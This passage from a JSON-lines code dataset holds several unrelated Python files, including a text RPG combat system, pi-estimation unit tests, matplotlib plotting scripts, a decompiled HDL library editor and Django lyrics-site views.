combat_stats(character):\n\tprinto (\"\\n[\"+character.name+\"] [\"+str(character.role)+\"] Level: [\"+str(character.level)+\"]\")\n\tprinto(\"Health: [\"+str(character.health[0]) +\"/\"+str(character.health[1])+\"]\")\n\tprinto(\"Weapon: [\"+str(character.weapon)+\"] [\"+str(character.weaponD[0])+\"-\"+str(character.weaponD[1])+\"] Bonus: [\"+str(character.strength_bonus)+\"]\")\n\treturn 0\n\n#Based on first strike, loops each player back and \n#forth until someone is dead\ndef attack_order(Player,Enemy):\n\n\t#When result is 0, the enemy has been defeated\n\tend_of_combat = False\n\twhile end_of_combat == False:\n\t\n\t\t#If the player has first strike, they attack first\n\t\tif Player.first_strike:\n\t\t\t# (attacker,defender)\t\t\t\n\t\t\tend_of_combat = attack(Player,Enemy)\n\t\t\tend_of_combat = attack(Enemy,Player)\n\t\t\t \n\t\t\t#Else, enemy attacks first\n\t\telse:\n\t\t\tend_of_combat = attack(Enemy,Player)\n\t\t\tend_of_combat = attack(Player,Enemy)\n\t\n\treturn 0\n\n#Defines actions that take place after combat finishes\ndef combat_end(Player,Enemy):\n\tclear_screen()\n\tprinto(\"---Combat is Over---\")\n\tprinto(Enemy.name+\" has been defeated!\")\n\texperience(Player, Enemy)\n\t\n\t#If applicable, restore health to player\n\trestoration(Player)\n\tos.system(\"pause\")\n\tdisplay_stats(Player)\n\tos.system(\"pause\")\n\t\n\treturn 0\n\t\n#Heal character after combat if they have restoration\ndef restoration(Player):\n\tif Player.restoration > 0:\n\t\tPlayer.health[0] = Player.health [0] + Player.restoration\n\t\tif Player.health[0] > Player.health[1]:\n\t\t\tPlayer.health[0] = Player.health[1]\n\t\tprinto(\"\\n\"+str(Player.name)+\"'s natural healing takes effect\")\n\t\tprinto(str(Player.name)+\" has restored: [\"+str(Player.restoration)+\"] Health.\")\n\t\tprinto(str(Player.name)+\": [\"+str(Player.health[0])+\"/\"+str(Player.health[1])+\"] Health\")\n\treturn Player\n\n#Player chooses their action during combat\ndef combat_selection(Attacker,Defender):\n\twhile 1:\n\t\ttry:\n\t\t\tprinto(\"[1] - Attack with [\"+str(Attacker.weapon)+\"] (\"+str(Attacker.damage[0])+\"-\"+str(Attacker.damage[1])+\")\")\n\t\t\tprinto(\"[2] - Wait\")\n\t\t\tselection = int(printi(\"Choose:\"))\n\t\t\tif selection == 1:\n\t\t\t\treturn 1\n\t\t\tif selection == 2:\n\t\t\t\treturn 2\n\t\t\tprinto(\"Invalid Input!\")\n\t\texcept ValueError as e:\n\t\t\tprinto(\"Invalid Input!\\n\")\n\t\t\tcontinue\n\t\n\treturn 0\n \n#If the player has 0 health, the game is over\ndef game_over_check(Attacker,Defender):\n\tif (Defender.health[0] <= 0 and Defender.is_player == True):\n\t\tclear_screen()\n\t\tprinto(\"You have died.\")\n\t\tprinto(\"Your adventure ends here...\")\n\t\tos.system(\"pause\")\n\t\tdisplay_stats(Defender)\n\t\tsys.exit()\n\t\t\n\tif (Attacker.health[0] <= 0 and Attacker.is_player == True):\n\t\tclear_screen()\n\t\tprinto(\"You have died.\")\n\t\tprinto(\"Your adventure ends here...\")\n\t\tdisplay_stats(Attacker)\n\t\tsys.exit()\n\treturn 0\n \n#Calculates damaged based on attacker stats\ndef attack(Attacker,Defender):\n\t\n\t#Attacker cannot respond if they are dead\n\tif Attacker.health[0] <= 0:\n\t\treturn\n\t\n\t#Header for Attacking function\n\tprinto(\"\\n\")\n\tprinto(\"---\"+Attacker.name+\"'s Turn---\")\n\t\n\t#Player selects their attack type\n\tif Attacker.is_player == True:\n\t\tselection = combat_selection(Attacker,Defender)\n\t\n\t#Enemy Selection is chosen randomly\n\telse:\n\t\tselection = 1\t\n\t\n\t#Basic Attack Calculation\n\tif selection == 1:\n\t\t#Calculate damage based on random range between low and high end \n\t\tend_of_combat = basic_attack(Attacker,Defender)\n\t\treturn end_of_combat\n\t\n\telif selection == 2:\n\t\tprinto(\"You choose to skip your turn\")\n\t\treturn False\n\n\t#should not reach this line\n\treturn False\n\n#Display's the damage from combat to the screen\ndef damage_display(Attacker,Defender,damage):\n\tprinto(str(Attacker.name)+\" hits \"+str(Defender.name)+\" for: [\"+str(damage)+\"] Damage with: [\"+str(Attacker.weapon)+\"]\")\n\tprinto(str(Defender.name)+\" now has: [\"+str(Defender.health[0])+\"] / [\"+str(Defender.health[1])+\"]\")\n\tos.system(\"pause\")\n\treturn 0\n\n#Apply damage to the defending player's health\ndef damage_apply(Attacker,Defender, damage):\n\tDefender.health[0] = Defender.health[0] - damage\n\t#return 0 if Defender has died\n\tif Defender.health[0] <= 0:\n\t\treturn True\n\treturn False\n\ndef level_up(Player):\n\tprinto(\"---LEVEL UP!---\")\n\tPlayer.level += 1\n\treturn 0\n\n#Gain experience after combat based on enemy defeated\ndef experience(Player, Enemy):\n\tPlayer.experience += Enemy.level\n\tprinto(\"Experience gain: +[\"+str(Enemy.level)+\"]\")\n\tprinto(\"Experience: [\"+str(Player.experience)+\"/\"+str(Player.experience_to_level[Player.level])+\"]\")\n\tif (Player.experience >= Player.experience_to_level[Player.level]):\n\t\tPlayer.experience = Player.experience - Player.experience_to_level[Player.level]\n\t\tlevel_up(Player)\n\n\treturn 0\n\n#Applies protection to combat \ndef protection(Attacker, Defender, damage):\n\tif Defender.protection > 0:\n\t\t#Reduce Damage based on protection\n\t\tdamage = damage - Defender.protection\n\t\tif damage < 0:\n\t\t\tdamage = 0\n\treturn damage\n\n#Calculates if a critical hit occurs\ndef critical_hit(Attacker, Defender, damage):\n\tcritical = randint (1,100)\n\tif critical > 100 - Attacker.critical:\n\t\tprinto(\"Critical hit!\")\n\t\treturn damage * 2\n\treturn damage\n\n#Performs a basic weapon attack based on damage range\ndef basic_attack(Attacker, Defender):\n\t\n\t#Base Damage based on damage range\n\tdamage = randint(Attacker.damage[0],Attacker.damage[1])\n\n\t#Apply Attacker Critical Strike\n\tdamage = critical_hit(Attacker, Defender, damage)\n\t\n\t#Apply Defender protection\n\tdamage = protection(Attacker, Defender,damage)\n\t\n\t#Removes health from Defender based on attack damage\n\t#If combat is over it will return True\n\tend_of_combat = damage_apply(Attacker, Defender, damage)\n\t\n\t#Display's damage output to the screen\n\tdamage_display(Attacker, Defender, damage)\n\t\n\tgame_over_check(Attacker,Defender)\n\treturn end_of_combat\n\n#If the player has defeated all levels of the tower\ndef victory_screen(Player):\n\tclear_screen()\n\tprinto(\"You've ascended to the top of the tower.\")\n\tprinto(\"Victory is yours!\")\n\tdisplay_stats (Player)\n\tsys.exit()\n\treturn 0\n \n#Main is the hub that calls other functions to start the game \ndef main(): \n\n\t#Clear the screen before the game starts\n\tclear_screen()\n\t\n\t#Display intro screen\n\tintro()\n\t\n\t#Select a nam\n\tname = character_name()\n\t\n\t#pick a class\n\tPlayer = class_selection(name)\n\n\t#The Class Player now contains all info about the player.\n\t\n\t#Select a gameplay mode\n\tmode = gameplay_selection()\n\t\n\tif mode == 1:\n\t\ttower_mode(Player)\n\tif mode == 2:\n\t\tstory_mode(Player)\t\t \t\n\treturn 0\n\t\n#Call main to begin the game (Set random seed for randomness!)\nseed(time.time())\nmain( )","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":19010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"173908990","text":"import math\nimport unittest\nimport random as rd\n\nclass TestWallis(unittest.TestCase):\n def test_low_iters(self):\n for i in range(0, 5):\n pi = wallis(i)\n self.assertTrue(abs(pi - math.pi) > 0.15, msg=f\"Estimate with just {i} iterations is {pi} which is too accurate.\\n\")\n \n def test_high_iters(self):\n for i in range(500, 600):\n pi = wallis(i)\n self.assertTrue(abs(pi - math.pi) < 0.01, msg=f\"Estimate with even {i} iterations is {pi} which is not accurate enough.\\n\")\n\n\nclass TestMC(unittest.TestCase):\n def test_randomness(self):\n pi0 = monte_carlo(15000)\n pi1 = monte_carlo(15000)\n \n self.assertNotEqual(pi0, pi1, \"Two different estimates for PI are exactly the same. This is almost impossible.\")\n\n self.assertFalse(abs(pi0 - pi1) > 0.05, \"Two different estimates of PI are too different. This should not happen\")\n\n def test_accuracy(self):\n for i in range(500, 600):\n pi = monte_carlo(i)\n self.assertTrue(abs(pi - math.pi) < 0.4, msg=f\"Estimate with even {i} iterations is {pi} which is not accurate enough.\\n\")\n\ndef wallis(n):\n\ts=1\n\tfor i in range(1,n+1):\n\t\td=4*i*i\n\t\tm=(d)/(d-1)\n\t\ts=s*m\n\treturn 2*s\ndef monte_carlo(n):\n\tsu=0\n\tfor i in range(n):\n\t\t(x,y)=(rd.random(),rd.random())\n\t\tk=x*x+y*y\n\t\tif(k<=1):\n\t\t\tsu=su+1\n\tv=4*(su/n)\n\treturn v \n \nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"estimate.py","file_name":"estimate.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"609460980","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport struct as struct\nfrom array import array\n\ndata_type = dtype=np.dtype('u1')\nbindata = np.fromfile(\"rgbdata.dat\", data_type)\nR = np.zeros((1080, 1920), dtype=data_type)\nG = np.zeros((1080, 1920), dtype=data_type)\nB = np.zeros((1080, 1920), dtype=data_type)\nfor j in range(0, 1920):\n for i in range(0, 1080):\n R[i][j] = bindata[0*1920*1080 + i*1920+j]\n G[i][j] = bindata[1*1920*1080 + i*1920+j]\n B[i][j] = bindata[2*1920*1080 + i*1920+j]\n\nplt.subplot(131)\nplt.imshow(R, cmap='gray', interpolation='nearest')\nplt.title(\"Red\")\nplt.subplot(132)\nplt.imshow(G, cmap='gray', interpolation='nearest')\nplt.title(\"Green\")\nplt.subplot(133)\nplt.imshow(B, cmap='gray', interpolation='nearest')\nplt.title(\"Blue\")\n\nplt.show()\n","sub_path":"plot_rgb.py","file_name":"plot_rgb.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"456586428","text":"from __future__ import unicode_literals\nfrom uncertainties import *\nfrom converterNew import *\nfrom uncertainties import unumpy\nfrom uncertainties import *\nfrom uncertainties.umath import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport matplotlib\n\n##matplotlib.rcParams['text.usetex'] = True\n##matplotlib.rcParams['text.latex.unicode'] = True\nfrom matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n\n#alle Graphen werden in Graphen gespeichert\nif not os.path.exists(\"Graphen\"):\n os.mkdir(\"Graphen\")\n\n#data enthält sämtliche Information\n#data = np.array(convert(\"messwerteText\"))\n\n#data = convert(\"test\")\ndata = convert(\"Temperatur_back_front\")\n#print(data[0])\n\nfast=4\nslow=7\nslice=300\n\ntime1 = np.array(data[0],dtype=float)\ntime1 = np.concatenate((time1[0:slice:fast],time1[slice:1971:slow]))\n#time1=time1[0::2]\ntime2 = np.array(data[3],dtype=float)\ntime2 = np.concatenate((time2[0:slice:fast],time2[slice::slow]))\n#time2=time2[0::2]\nT1a = np.array(data[2], dtype=float)\nT1a = np.concatenate((T1a[0:slice:fast],T1a[slice:1971:slow]))\n#T1a=T1a[0::2]\nT1p = np.array(data[1], dtype=float)\nT1p = np.concatenate((T1p[0:slice:fast],T1p[slice:1971:slow]))\n#T1p=T1p[0::2]\nT2a = np.array(data[5], dtype=float)\nT2a = np.concatenate((T2a[0:slice:fast],T2a[slice::slow]))\n#T2a=T2a[0::2]\nT2p = np.array(data[4], dtype=float)\nT2p = np.concatenate((T2p[0:slice:fast],T2p[slice::slow]))\n#T2p=T2p[0::2]\n#x = x[0::100]\n\n#y = y[0::100]\n\n\n# Abbidlungen\nfig, ax = plt.subplots()\nax.plot(time1,T1p, color = 'blue', marker='o', linestyle='', markersize = 1)\nax.plot(time1,T1a,'b--',linewidth = 0.6)\nax.plot(time2,T2p,'ro',markersize = 1)\nax.plot(time2,T2a,'r--',linewidth = 0.6)\nax.set(xlabel='Time (s)',ylabel='Temperature (K)')\nax.grid(True,linestyle='--',linewidth = 0.3)\n#ax.legend(loc='upper left',frameon=True)\n\nplt.xlim(-70,2600)\nplt.ylim(-1,15.9)\nplt.annotate('a', xy=(400,14), fontsize=14)\nplt.annotate('b', xy=(400,10.5), fontsize=14)\nplt.annotate('c', xy=(400,8.3), fontsize=14)\nplt.annotate('d', xy=(400,6.3), fontsize=14)\n\n#plt.annotate('a', xy=(2100,14), fontsize=14)\n#plt.annotate('b', xy=(2100,11), fontsize=14)\n#plt.annotate('c', xy=(2125,9), fontsize=14)\n#plt.annotate('d', xy=(2150,6.5), fontsize=14)\n\n#plt.xscale('log')\n#plt.title('test')\n\n#plt.plot(pointX, pointY, 'go', markersize=5)\n#plt.plot(lineX, lineY, 'r--', linewidth=0.8)\n#plt.errorbar(X, Y, yerr=0.1, fmt='ko', linewidth=0.8, capsize=3, capthick=0.8, markersize=5)\n#plt.xlabel(r'$\\textbf{Time } (ms)$')\n#plt.ylabel(r'$\\textbf{Temperature } (K)$')\ni='back_front'\nplt.savefig(\"Graphen/Temperature_\" + str(i) + \".png\")\n\nplt.show()","sub_path":"PlottingGp-master/Temperatur_back_front.py","file_name":"Temperatur_back_front.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"333825302","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/muntjac/demo/sampler/features/embedded/WebEmbedExample.py\n# Compiled at: 2013-04-04 15:36:38\nfrom muntjac.api import VerticalLayout, Embedded\nfrom muntjac.terminal.external_resource import ExternalResource\n\nclass WebEmbedExample(VerticalLayout):\n\n def __init__(self):\n super(WebEmbedExample, self).__init__()\n e = Embedded('Google Search', ExternalResource('http://www.google.com'))\n e.setType(Embedded.TYPE_BROWSER)\n e.setWidth('100%')\n e.setHeight('400px')\n self.addComponent(e)","sub_path":"pycfiles/Muntjac-1.1.2-py2.7/WebEmbedExample.py","file_name":"WebEmbedExample.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"81643928","text":"lines = [n.strip() for n in open('d6in.txt').read().splitlines()]\n\ngroups = []\nnew_group = True\n\nfor line in lines:\n if new_group:\n groups.append(set([c for c in line]))\n new_group = False\n elif line == '':\n new_group = True\n else:\n groups[-1] &= set([c for c in line])\n\ncounts = [len(group) for group in groups]\n\nprint(sum(counts))\n","sub_path":"day06/d6b.py","file_name":"d6b.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"84802184","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.5/dist-packages/HdlLib/SysGen/LibEditor.py\n# Compiled at: 2017-07-08 08:29:58\n# Size of source mod 2**32: 15472 bytes\n\"\"\"\nOpen a Gtk window enabling to browse the service library.\nIcons for library an service must be set when called from another location.\n\"\"\"\nimport logging, os, sys\nfrom lxml import etree\nfrom HdlLib.SysGen import Condition\nfrom HdlLib.SysGen import HDLEditor as HDL\nfrom HdlLib.SysGen import Module\n\ndef HDLModule(OutputPath, Mod, Packages, Libraries, Declarations, Content):\n \"\"\"\n Create a VHDL file with specified code content.\n \"\"\"\n OutputFilePath = os.path.join(OutputPath, Mod.Name + HDL.ExtensionDict['VHDL'])\n with open(OutputFilePath, 'w+') as (HDLFile):\n HDLFile.write(HDL.Header(Mod.Name, Mod.Title, Mod.Purpose, Mod.Desc, Mod.Issues, Mod.Speed, Mod.Area, Mod.Tool, Mod.Version))\n HDLFile.write(HDL.Libraries(Libraries))\n HDLFile.write(HDL.Packages(Packages))\n UsedParams = set(Mod.GetUsedParam())\n Generics = [x.HDLFormat(Mod.Vars.copy()) for x in [x for x in list(Mod.Params.values()) if x.Name in UsedParams]]\n for G in Generics:\n Mod.Vars.update({G.Name: G.InitVal})\n\n if Mod.NoOrthoPorts is True:\n Ports = [x.HDLFormat(Mod.Vars.copy()) for x in list(Mod.Ports.values())]\n else:\n Ports = [x.HDLFormat(Mod.Vars.copy()) for x in list(Mod.Ports.values()) + list(Mod.OrthoPorts.values())]\n Ports = RemoveDuplicated(Ports)\n HDLFile.write(HDL.Entity(Mod.Name, Generics, Ports, Comments=Mod.Purpose))\n HDLFile.write(HDL.Architecture('RTL', Mod.Name, Declarations, Content, Mod.Desc))\n return OutputFilePath\n\n\ndef NewModule(Infos={}, Params=[], Ports=[], Clocks=[], Resets=[], Sources=[]):\n \"\"\"\n Create a module to add to library (and its associated XML).\n return Module object created.\n \"\"\"\n M = etree.Element('module', name=Infos['Name'], version=Infos['Version'], title=Infos['Title'], purpose=Infos['Purpose'], description=Infos['Desc'], tool=Infos['Tool'], area=Infos['Area'], speed=Infos['Speed'], issues=Infos['Issues'])\n for Param in Params:\n etree.SubElement(M, 'parameter', name=Param.Name, size=str(Param.GetSize()), type=Param.Type, default=str(Param.GetValue()))\n\n for Port in Ports:\n if Port.Direction == 'IN':\n etree.SubElement(M, 'input', name=Port.Name, size=str(Port.Size), type=Port.Type, default=str(Port.GetValue()))\n else:\n etree.SubElement(M, 'output', name=Port.Name, size=str(Port.Size), type=Port.Type, default=str(Port.GetValue()))\n\n Services = etree.SubElement(M, 'services')\n for C in Clocks:\n Required = etree.SubElement(Services, 'required', name='clock', type='orthogonal', version='1.0', alias='Clk')\n MAP = etree.SubElement(Required, 'map', formal='clock', actual=C)\n MAP = etree.SubElement(Required, 'map', formal='freq', actual='50')\n\n for R in Resets:\n Required = etree.SubElement(Services, 'required', name='reset', type='orthogonal', version='1.0', alias='Rst')\n MAP = etree.SubElement(Required, 'map', formal='reset', actual=R)\n MAP = etree.SubElement(Required, 'map', formal='delay', actual='0')\n\n if len(Sources) > 0:\n etree.SubElement(M, 'resources')\n for Src in Sources:\n Core = etree.SubElement(M, 'core')\n etree.SubElement(Core, 'rtl', path=Src)\n\n return Module.Module(M)\n\n\ndef ModuleXml(Mod):\n \"\"\"\n Generate XML for module provided as Mod.\n \"\"\"\n XmlMod = etree.Element('module', name=Mod.Name, version=Mod.Version, title=Mod.Title, purpose=Mod.Purpose, description=Mod.Desc, tool=Mod.Tool, area=Mod.Area, speed=Mod.Speed, issues=Mod.Issues)\n for ParamName, Param in Mod.Params.items():\n RefAttr = {'name': Param.Name, 'size': str(Param.GetSize()), 'type': Param.Type, 'default': str(Param.GetValue())}\n AttrDict = collections.OrderedDict()\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(XmlMod, 'parameter', **AttrDict)\n\n for PortName, Port in Mod.Ports.items():\n RefAttr = {'name': Port.Name, 'size': str(Port.Size), 'type': Port.Type, 'default': str(Port.GetValue())}\n if Port.Func is not None:\n RefAttr['func'] = Port.Func\n AttrDict = collections.OrderedDict()\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n AttrDict.update(Port.SpecialParameters)\n XMLElmt = etree.SubElement(XmlMod, 'output' if Port.Direction == 'OUT' else 'input', **AttrDict)\n\n ProvServices = etree.SubElement(XmlMod, 'services')\n for SAlias, SName in Mod.ServAlias.items():\n Mapping = Mod.ProvidedServMap[SName]\n Offered = etree.SubElement(ProvServices, 'offered', alias=SName.split('.')[(-1)], name=SName)\n for Formal, Actual in Mapping.items():\n if isinstance(Actual, list):\n FormatedList = [':'.join([x[0], x[1].GetName()]) for x in Actual]\n XMLElmt = etree.SubElement(Offered, 'map', formal=Formal, actual='{' + ','.join(FormatedList) + '}')\n else:\n XMLElmt = etree.SubElement(Offered, 'map', formal=Formal, actual=Actual)\n\n return XmlMod\n\n def ActualXMLRepr(InstName, SigName, Index):\n \"\"\"Return XML representation of an actual signal\"\"\"\n Actual = SigName\n if not (InstName is None or InstName == ''):\n Actual = InstName + '.' + Actual\n if not (Index is None or Index == ''):\n Actual = Actual + ':' + str(Index)\n return Actual\n\n def AddXMLMapping(PName, Mapping, RequiredXmlElmt):\n \"\"\"Add XML mapping corresponding to dictionary mapping to an XML element\"\"\"\n if PName in Mapping:\n ActualList, ACond, IdxDict = Mapping[PName]\n if len(ActualList) > 1:\n ActualNames = []\n for InstName, SigName, Index in ActualList:\n ActualNames.append(ActualXMLRepr(InstName, SigName, Index))\n\n Actual = '{' + ','.join(ActualNames) + '}'\n else:\n InstName, SigName, Index = ActualList[0]\n Actual = ActualXMLRepr(InstName, SigName, Index)\n if isinstance(ACond, Condition.Condition):\n ExtraArg = {'when': str(ACond)}\n else:\n ExtraArg = {}\n else:\n Actual = PName\n ExtraArg = {}\n return etree.SubElement(RequiredXmlElmt, 'map', formal=PName, actual=Actual, **ExtraArg)\n\n for ID, (Serv, Mapping, IsOrtho, Constraints) in Mod.ReqServ.items():\n if Serv is None:\n continue\n logging.error('Service not referenced library {0}.'.format(ID))\n Alias = ID.split('#')[(-1)]\n XmlRequired = etree.SubElement(Services, 'required', name=Serv.Name, type=str(Serv.Type), version=str(Serv.Version), alias=Alias)\n for PName in sorted(Serv.Params.keys()):\n XMLElmt = AddXMLMapping(PName, Mapping=Mapping, RequiredXmlElmt=XmlRequired)\n\n for PName in sorted(Serv.Ports.keys()):\n XMLElmt = AddXMLMapping(PName, Mapping=Mapping, RequiredXmlElmt=XmlRequired)\n\n for SrcType in Mod.Sources:\n if len(Mod.Sources[SrcType]) > 0:\n etree.SubElement(XmlMod, 'resources')\n for Src in Mod.Sources[SrcType]:\n Core = etree.SubElement(XmlMod, 'core')\n XMLElmt = etree.SubElement(Core, SrcType, path=Src)\n\n return XmlMod\n\n\ndef ProvidedServiceXml(Mod, Interfaces, Infos, OutputPath=None):\n \"\"\"\n Generate XML for service provided by module Mod.\n Dump into OutputPath file if specified.\n \"\"\"\n S = etree.Element('service', name=Infos['Name'], type=Infos['Type'], version=Infos['Version'], category=Infos['Category'])\n Mapping = {}\n for ParamName, Param in Mod.Params.items():\n RefAttr = {'default': str(Param.GetValue()), 'name': Param.Name, 'size': str(Param.Size), 'type': Param.Type}\n AttrDict = {}\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(S, 'parameter', **AttrDict)\n Mapping[Param.Name] = Param.Name\n\n for PortName, Port in Mod.Ports.items():\n RefAttr = {'name': Port.Name, 'size': str(Port.Size), 'type': Port.Type, 'default': str(Port.GetValue())}\n AttrDict = {}\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(S, 'output' if Port.Direction == 'OUT' else 'input', **AttrDict)\n Mapping[Port.Name] = Port.Name\n\n ProvidedService = Infos['Name']\n Mod.AddProvServ(SName=Infos['Name'], SAlias=Infos['Name'], mapping=Mapping)\n for I in Interfaces:\n S.append(I.GetXMLElmt())\n\n import Service\n try:\n Serv = Service.Service(S)\n except:\n logging.error(\"[LibEditor.ProvidedServiceXml] Cannot instanciate service '{0}' from XML element.\".format(Infos['Name']))\n sys.exit(1)\n\n Mod.IdentifyServices([Serv])\n Serv.ModList.append(Mod)\n Serv.Interfaces = Interfaces\n return Serv\n\n\ndef ServiceXml(Serv):\n \"\"\"\n Generate XML for service provided as Serv.\n \"\"\"\n S = etree.Element('service', name=Serv.Name, type=Serv.Type, version=Serv.Version, category=Serv.Category)\n for ParamName, Param in Serv.Params.items():\n RefAttr = {'name': Param.Name, 'size': Param.Size, 'type': Param.Type, 'default': Param.Default}\n AttrDict = {}\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(S, 'parameter', **AttrDict)\n\n for PortName, Port in Serv.Ports.items():\n RefAttr = {'name': Port.Name, 'size': Port.Size, 'type': Port.Type, 'default': Port.Default}\n AttrDict = {}\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(S, 'output' if Port.Direction == 'OUT' else 'input', **AttrDict)\n\n for I in Serv.Interfaces:\n S.append(I.GetXMLElmt())\n\n return S\n\n\ndef InterfaceXml(Itf, Mapping={}):\n \"\"\"\n Generate XML for service provided in Itf.\n \"\"\"\n IElmt = etree.Element('interface', name=Itf.Name, direction=Itf.Direction, number='1')\n for D in Itf.DataList:\n if D.Name in Mapping:\n XMLElmt = etree.SubElement(IElmt, 'data', name=D.Name, target=Mapping[D.Name])\n else:\n if D.Name in Itf.Mapping:\n XMLElmt = etree.SubElement(IElmt, 'data', name=D.Name, target=Itf.Mapping[D.Name])\n else:\n XMLElmt = etree.SubElement(IElmt, 'data', name=D.Name, target=D.Name)\n\n for C in Itf.CtrlList:\n if C.Name in Mapping:\n XMLElmt = etree.SubElement(IElmt, 'ctrl', name=C.Name, target=Mapping[C.Name])\n else:\n if C.Name in Itf.Mapping:\n XMLElmt = etree.SubElement(IElmt, 'ctrl', name=C.Name, target=Itf.Mapping[C.Name])\n else:\n XMLElmt = etree.SubElement(IElmt, 'ctrl', name=C.Name, target=C.Name)\n\n if Itf.Protocol:\n for S in Itf.Protocol.IterSteps():\n S.AddXMLElmtTo(IElmt)\n\n else:\n logging.warning(\"No protocol specified for interface '{0}'\".format(Itf))\n return IElmt\n\n\ndef RemoveDuplicated(SignalList):\n \"\"\"\n Build a new list and fill it with a set of unique signals from argument list.\n \"\"\"\n SignalSet = []\n SignalNameSet = []\n for Sig in SignalList:\n if not SignalNameSet.count(Sig.Name):\n SignalSet.append(Sig)\n SignalNameSet.append(Sig.Name)\n\n return SignalSet","sub_path":"pycfiles/HdlLib-0.1.1.linux-x86_64.tar/LibEditor.cpython-35.py","file_name":"LibEditor.cpython-35.py","file_ext":"py","file_size_in_byte":12353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"123243676","text":"import sys\nimport numpy\nfrom collections import defaultdict\n\n#read the features in \n\ndef readFeatures(filename):\n word_list = []\n feature_list = []\n for line in open(filename):\n line = line.strip();\n if line == '':\n continue\n word,rest = line.split(' ',1)\n word_list.append(word)\n feature_list.append(map(float,rest.split()))\n return(word_list,numpy.array(feature_list))\n\ndef readGraph(filename,word_to_index):\n graph = numpy.zeros((len(word_to_index),len(word_to_index)),int)\n for line in open(filename):\n line = line.strip()\n if line == \"\":\n continue\n w1,w2,cost = line.split()\n #print w1,w2\n #raw_input()\n graph[word_to_index[w1]][word_to_index[w2]] = 1\n\n return graph\n \n","sub_path":"CODE/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"610146511","text":"from django.core.exceptions import MultipleObjectsReturned\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom django.utils.text import slugify\nfrom django.db.models.functions import Lower\nfrom .models import Artist, Song\nfrom .helpers import SLUG_TO_ARTIST, SLUG_TO_SONG_TITLE\n\nclass IndexView(TemplateView):\n\n template_name = 'mainsite/index.html'\n\n def get_context_data(self, **kwargs):\n context = super(IndexView, self).get_context_data(**kwargs)\n return context\n\nclass TranslationsView(TemplateView):\n template_name = 'mainsite/translations.html'\n\nclass LanguageView(TemplateView):\n template_name = 'mainsite/language.html'\n\nclass ArtView(TemplateView):\n template_name = 'mainsite/art.html'\n\nclass GardenView(TemplateView):\n template_name = 'mainsite/garden.html'\n\nclass LinksView(TemplateView):\n template_name = 'mainsite/links.html'\n\nclass ArtistsView(TemplateView):\n\n template_name = 'mainsite/artists.html'\n\n def get_context_data(self, **kwargs):\n context = super(ArtistsView, self).get_context_data(**kwargs)\n artists = Artist.objects.all().order_by(Lower('name_romaji'))\n\n artists_and_slugs = {}\n\n for artist in artists:\n # Convert to lower case and replace spaces with dashes so the artists' names can be used as slugs\n slug = slugify(artist.name_romaji)\n # Create a dictionary where artists' names are mapped to their slug counterparts\n # Example: {'Hamasaki Ayumi': 'hamasaki-ayumi'}\n artists_and_slugs[artist] = slug\n\n context['artists_and_slugs'] = artists_and_slugs\n\n return context\n\nclass SongListView(TemplateView):\n\n template_name = 'mainsite/songlist.html'\n\n def get_context_data(self, **kwargs):\n context = super(SongListView, self).get_context_data(**kwargs)\n # Convert the slug hyphen to a space to look it up in the db\n lookup_name = self.kwargs['slug'].replace('-', ' ')\n context['artist'] = lookup_name\n context['artist_slug'] = self.kwargs['slug']\n\n # Get all the song names for the artist\n songs = Song.objects.filter(artist__name_romaji__iexact=lookup_name).order_by(Lower('title_romaji'))\n\n # There are a few artists this trick won't work for. They are special and get their own constants dictionary.\n if not songs:\n lookup_name = SLUG_TO_ARTIST[self.kwargs['slug']]\n songs = Song.objects.filter(artist__name_romaji=lookup_name)\n\n songs_and_slugs = {}\n\n for song in songs:\n slug = slugify(song.title_romaji)\n songs_and_slugs[song] = slug\n\n context['songs_and_slugs'] = songs_and_slugs\n\n return context\n\nclass LyricsView(TemplateView):\n\n template_name = 'mainsite/lyrics.html'\n\n def get_context_data(self, **kwargs):\n context = super(LyricsView, self).get_context_data(**kwargs)\n artist_name = 